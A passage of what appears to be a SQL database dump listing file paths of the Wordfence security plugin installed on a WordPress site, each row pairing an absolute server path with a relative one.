rdfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),(12368,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),(12369,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/admin-global.1695657196.js','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1695657196.js'),(12370,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/admin.1695657196.js','wp-content/plugins/wordfence/modules/login-security/js/admin.1695657196.js'),(12371,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/chart.umd.1695657196.js','wp-content/plugins/wordfence/modules/login-security/js/chart.umd.1695657196.js'),(12372,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1695657196.js','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1695657196.js'),(12373,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1695657196.js','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1695657196.js'),(12374,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1695657196.js','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1695657196.js'),(12375,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1695657196.js','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1695657196.js'),(12376,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/login.1695657196.js','wp-content/plugins/wordfence/modules/login-security/js/login.1695657196.js'),(12377,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/.htaccess','wp-content/plugins/wordfence/modules/login-security/views/.htaccess'),(12378,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),(12379,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/common/reset-grace-period.php','wp-content/plugins/wordfence/modules/login-security/views/common/reset-grace-period.php'),(12380,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/common/revoke-grace-period.php','wp-content/plugins/wordfence/modules/login-security/views/common/revoke-grace-period.php'),(12381,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),(12382,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),(12383,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/manage/code.php','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),(12384,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),(12385,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php','wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php'),(12386,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),(12387,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),(12388,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),(12389,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),(12390,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),(12391,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),(12392,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php'),(12393,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php'),(12394,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),(12395,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),(12396,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),(12397,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),(12398,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),(12399,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),(12400,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),(12401,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),(12402,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),(12403,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),(12404,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),(12405,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),(12406,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/manage-embedded.php','wp-content/plugins/wordfence/modules/login-security/views/page/manage-embedded.php'),(12407,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/manage.php','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),(12408,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/page.php','wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),(12409,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/permission-denied.php','wp-content/plugins/wordfence/modules/login-security/views/page/permission-denied.php'),(12410,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/role.php','wp-content/plugins/wordfence/modules/login-security/views/page/role.php'),(12411,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),(12412,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/settings.php','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),(12413,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),(12414,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/settings/options.php','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),(12415,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),(12416,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php','wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php'),(12417,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),(12418,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/readme.txt','wp-content/plugins/wordfence/readme.txt'),(12419,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/tmp/.htaccess','wp-content/plugins/wordfence/tmp/.htaccess'),(12420,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/.htaccess','wp-content/plugins/wordfence/vendor/.htaccess'),(12421,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/autoload.php','wp-content/plugins/wordfence/vendor/autoload.php'),(12422,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/ClassLoader.php','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),(12423,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/InstalledVersions.php','wp-content/plugins/wordfence/vendor/composer/InstalledVersions.php'),(12424,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/LICENSE','wp-content/plugins/wordfence/vendor/composer/LICENSE'),(12425,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),(12426,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),(12427,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),(12428,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/autoload_real.php','wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),(12429,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/autoload_static.php','wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),(12430,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/installed.json','wp-content/plugins/wordfence/vendor/composer/installed.json'),(12431,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/installed.php','wp-content/plugins/wordfence/vendor/composer/installed.php'),(12432,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/ControlByte.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/ControlByte.php'),(12433,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DataFieldParser.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DataFieldParser.php'),(12434,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Database.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Database.php'),(12435,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DatabaseMetadata.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DatabaseMetadata.php'),(12436,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Endianness.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Endianness.php'),(12437,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/FormatException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/FormatException.php'),(12438,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php'),(12439,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleVersionException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleVersionException.php'),(12440,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidArgumentException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidArgumentException.php'),(12441,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php'),(12442,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidOperationException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidOperationException.php'),(12443,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IoException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IoException.php'),(12444,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbException.php'),(12445,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbThrowable.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbThrowable.php'),(12446,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/RuntimeMmdbException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/RuntimeMmdbException.php'),(12447,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IntegerParser.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IntegerParser.php'),(12448,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Io/FileHandle.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Io/FileHandle.php'),(12449,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddress.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddress.php'),(12450,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddressInterface.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddressInterface.php'),(12451,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Node.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Node.php'),(12452,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeReader.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeReader.php'),(12453,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeRecord.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeRecord.php'),(12454,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem'),(12455,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key'),(12456,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php'),(12457,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/api.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/api.php'),(12458,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php'),(12459,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php'),(12460,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php'),(12461,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php'),(12462,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php'),(12463,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php'),(12464,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php'),(12465,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php'),(12466,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php'),(12467,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/shutdown.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/shutdown.php'),(12468,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php'),(12469,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php'),(12470,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php'),(12471,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php'),(12472,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php'),(12473,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php'),(12474,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php'),(12475,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key'),(12476,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php'),(12477,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php'),(12478,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php'),(12479,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php'),(12480,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php'),(12481,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/.htaccess','wp-content/plugins/wordfence/views/.htaccess'),(12482,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/blocking/block-list.php','wp-content/plugins/wordfence/views/blocking/block-list.php'),(12483,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/blocking/blocking-create.php','wp-content/plugins/wordfence/views/blocking/blocking-create.php'),(12484,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/blocking/blocking-status.php','wp-content/plugins/wordfence/views/blocking/blocking-status.php'),(12485,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/blocking/country-block-map.php','wp-content/plugins/wordfence/views/blocking/country-block-map.php'),(12486,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/blocking/country-modal.php','wp-content/plugins/wordfence/views/blocking/country-modal.php'),(12487,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php'),(12488,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php'),(12489,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php','wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php'),(12490,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/block-navigation-option.php','wp-content/plugins/wordfence/views/common/block-navigation-option.php'),(12491,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/indeterminate-progress.php','wp-content/plugins/wordfence/views/common/indeterminate-progress.php'),(12492,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/license.php','wp-content/plugins/wordfence/views/common/license.php'),(12493,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/modal-prompt.php','wp-content/plugins/wordfence/views/common/modal-prompt.php'),(12494,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php'),(12495,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/page-help.php','wp-content/plugins/wordfence/views/common/page-help.php'),(12496,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/page-tabbar.php','wp-content/plugins/wordfence/views/common/page-tabbar.php'),(12497,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/page-title.php','wp-content/plugins/wordfence/views/common/page-title.php'),(12498,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/section-subtitle.php','wp-content/plugins/wordfence/views/common/section-subtitle.php'),(12499,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/section-title.php','wp-content/plugins/wordfence/views/common/section-title.php'),(12500,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/status-circular.php','wp-content/plugins/wordfence/views/common/status-circular.php'),(12501,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/status-critical.php','wp-content/plugins/wordfence/views/common/status-critical.php'),(12502,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/status-detail.php','wp-content/plugins/wordfence/views/common/status-detail.php'),(12503,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/status-tooltip.php','wp-content/plugins/wordfence/views/common/status-tooltip.php'),(12504,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/status-warning.php','wp-content/plugins/wordfence/views/common/status-warning.php'),(12505,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/unsubscribe.php','wp-content/plugins/wordfence/views/common/unsubscribe.php'),(12506,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/global-status.php','wp-content/plugins/wordfence/views/dashboard/global-status.php'),(12507,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/option-howgetips.php','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php'),(12508,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-alert.php','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php'),(12509,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php','wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php'),(12510,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php'),(12511,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-general.php','wp-content/plugins/wordfence/views/dashboard/options-group-general.php'),(12512,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-import.php','wp-content/plugins/wordfence/views/dashboard/options-group-import.php'),(12513,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-license.php','wp-content/plugins/wordfence/views/dashboard/options-group-license.php'),(12514,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php'),(12515,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php'),(12516,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/status-renewing.php','wp-content/plugins/wordfence/views/dashboard/status-renewing.php'),(12517,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/diagnostics/text.php','wp-content/plugins/wordfence/views/diagnostics/text.php'),(12518,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/gdpr/banner.php','wp-content/plugins/wordfence/views/gdpr/banner.php'),(12519,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php'),(12520,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/offboarding/deactivation-prompt.php','wp-content/plugins/wordfence/views/offboarding/deactivation-prompt.php'),(12521,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/banner.php','wp-content/plugins/wordfence/views/onboarding/banner.php'),(12522,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php'),(12523,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/fresh-install.php','wp-content/plugins/wordfence/views/onboarding/fresh-install.php'),(12524,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php'),(12525,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/overlay.php','wp-content/plugins/wordfence/views/onboarding/overlay.php'),(12526,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/plugin-header.php','wp-content/plugins/wordfence/views/onboarding/plugin-header.php'),(12527,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/registration-prompt.php','wp-content/plugins/wordfence/views/onboarding/registration-prompt.php'),(12528,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/tour-overlay.php','wp-content/plugins/wordfence/views/onboarding/tour-overlay.